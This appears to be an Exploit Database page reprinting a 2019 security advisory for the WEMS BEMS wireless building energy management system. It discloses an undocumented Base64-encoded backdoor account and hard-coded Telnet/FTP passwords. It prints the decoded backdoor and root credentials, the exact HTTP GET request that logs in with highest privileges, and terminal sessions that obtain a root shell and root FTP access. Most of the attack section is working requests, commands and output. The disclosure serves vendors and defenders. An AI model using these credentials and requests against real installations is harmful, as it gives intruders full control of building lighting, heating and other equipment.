WEMS BEMS 21.3.1 – Undocumented Backdoor Account

• Exploit Database
• 135 阅读

• 作者： LiquidWorm
  日期： 2019-12-30
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47817/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211

  # Exploit: WEMS BEMS 21.3.1 - Undocumented Backdoor Account # Date: 2019-12-30 # Author: LiquidWorm # Vendor: WEMS Limited # Product web page: https://www.wems.co.uk # Advisory ID: ZSL-2019-5552 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php   WEMS BEMS 21.3.1 Undocumented Backdoor Account     Vendor: WEMS Limited Product web page: https://www.wems.co.uk Affected version: Web: 21.3.1 Web: 20.0beta Web: 19.5 Web: 18.4 Firmware: 1.26.6 (OS: 5.3) Firmware: 1.23.7 (OS: 5.0) Firmware: 1.21.4 (OS: 4.1a-usb) Firmware: 1.18.0.3 (OS: i686-1.1) Platform: Shockwave Flash (SWF) / CGI   Summary: We (WEMS) offer the world&apos;s first fully wireless energy management system. Our solution enables your organization to take control of its energy costs, by monitoring lighting, heating and air conditioning equipment to identify wastage across multiple sites and start saving money instantly. Additionally, we offer a service which enables you to personally control the settings of your building - remotely, via text messaging and the internet - from wherever you happen to be in the world.   Desc: The wireless BMS solution has an undocumented backdoor account that is Base64-encoded. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the controller thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The check_users.sh Bash script is used to generate the default accounts on the system with their passwords and privilege level. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level 3 when using the addhttpuser program which allows full availability of the features that the WEMS is offering remotely. WEMS also ships with hard-coded and weak credentials for Telnet/FTP access using the credentials gast:glasshou or root:glasshou.   Tested on: Linux 2.6.16 armv5tejl thttpd/2.25b Adam 7000 System WEMS OS 5.3     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2019-5552 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php     06.07.2019   --     Excerpt content of check_users.sh bash script: ----------------------------------------------   # cat /tmp/check_users.sh ... ... if [ -n "${varSystem}" ];then #add &apos;V.A.R.&apos; user credentials /mnt/bin/addhttpuser -u var -p 88fRK66Q -l 2 > /dev/null /mnt/bin/addhttpuser -u varuser -p user -l 1 > /dev/null /mnt/bin/addhttpuser -u varview -p view -l 0 > /dev/null else #add &apos;wems&apos; user credentials /mnt/bin/addhttpuser -u wems -p kup5EF4s -l 2 > /dev/null /mnt/bin/addhttpuser -u wemsuser -p user -l 1 > /dev/null /mnt/bin/addhttpuser -u wemsview -p view -l 0 > /dev/null fi   echo "Adding logging user credentials..." /mnt/bin/addhttpuser -u YWRhbWNvbGxlY3Q -p YzAxMTNjdGFkYW0K -l 3 > /dev/null   # Verify user added successfully... if [ "$?" -eq "255" ] then echo "Error when adding logging user credentials - aborting.." cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers exit fi   veri_user=<code>grep -e &apos;YWRhbWNvbGxlY3Q&apos; /mnt/etc/httpusers if [ -n "$veri_user" ] then echo "User credentials added successfully." cp -p /mnt/etc/httpusers /mnt/etc/httpusers.default exit else echo "Error when adding user credentials - restoring defaults." cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers fi ----------------------------------------------     Default and hard-coded credentials: -----------------------------------   WEMS: [Level 2/Admin - Web/SWF->CGI] : wems:kup5EF4s [Level 1/User - Web/SWF->CGI]: wemsuser:user [Level 0/View - Web/SWF->CGI]: wemsview:view [Level 3/Backdoor - Web/SWF->CGI]: YWRhbWNvbGxlY3Q:YzAxMTNjdGFkYW0K (adamcollect:c0113ctadam)   V.A.R. (Value Added Reseller):   [Level 2/Admin - Web/SWF->CGI] : var:88fRK66Q [Level 1/User - Web/SWF->CGI]: varuser:user [Level 0/View - Web/SWF->CGI]: varview:view   Shell:   [Level 500/User - Telnet/FTP]: gast:glasshou [Level 0/root - Telnet/FTP]: root:glasshou -----------------------------------     By calling the auth command through the cmd parameter, the cgiauth binary reads the /mnt/etc/httpusers file and checks validation for authentication. To login with the backdoor account the following HTTP GET request is made: --------------------------------------------------------------------------   GET /cgi-bin/cgiauth?user=YWRhbWNvbGxlY3Q&pass=YzAxMTNjdGFkYW0K&cmd=auth HTTP/1.1 Host: 192.168.1.17 User-Agent: Noproblem/25.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://192.168.1.17/SMARThome1.swf   Response observed:   HTTP/1.1 200 OK content-type: text/html Transfer-Encoding: chunked Date: Fri, 13 Sep 2019 18:15:17 GMT Server: WEMS OS 5.0 Casino   sessionid=EQhaZPEXgJQhkXeZ&level=3&username=YWRhbWNvbGxlY3Q     --------------------------------------------------------------------------     Running addhttpuser, reading httpusers file: --------------------------------------------   # /mnt/bin/addhttpuser Usage is -u <username> -p <password> -l <level> # cat /mnt/etc/httpusers 0:wems:$1$3EVBJ96F$RBX7xggVT8.zXM9vDbGWB/:2 1:wemsuser:$1$3EVBJA6F$Gr6zU7L0n4OPq7YdCM5.b1:1 2:wemsview:$1$3EVBJB6F$6XtYBc2VaQYucRe2T7lfa.:0 3:YWRhbWNvbGxlY3Q:$1$3EVBJD6F$scO5furQud3eKLHpNyUyo.:3 # ls -al /mnt/bin/addhttpuser -rwxr-xr-x1 root root16520 Jan 292014 /mnt/bin/addhttpuser --------------------------------------------     Root shell: -----------   $ telnet 192.168.1.17 Connected to 192.168.1.17. Escape character is &apos;^]&apos;.   - Adam 7000 System - Version 4.1a-usb -   WEMS login: gast Password:     BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash) Enter &apos;help&apos; for a list of built-in commands.   $ id uid=500(gast) gid=500 $ su Password:     BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash) Enter &apos;help&apos; for a list of built-in commands.   # id uid=0(root) gid=0(root) # netstat -nat Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp00 0.0.0.0:800.0.0.0:* LISTEN tcp00 0.0.0.0:210.0.0.0:* LISTEN tcp00 0.0.0.0:230.0.0.0:* LISTEN -----------     $ ftp 192.168.1.17 WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready. user root 331 Password required for root. pass glasshou 230 User root logged in.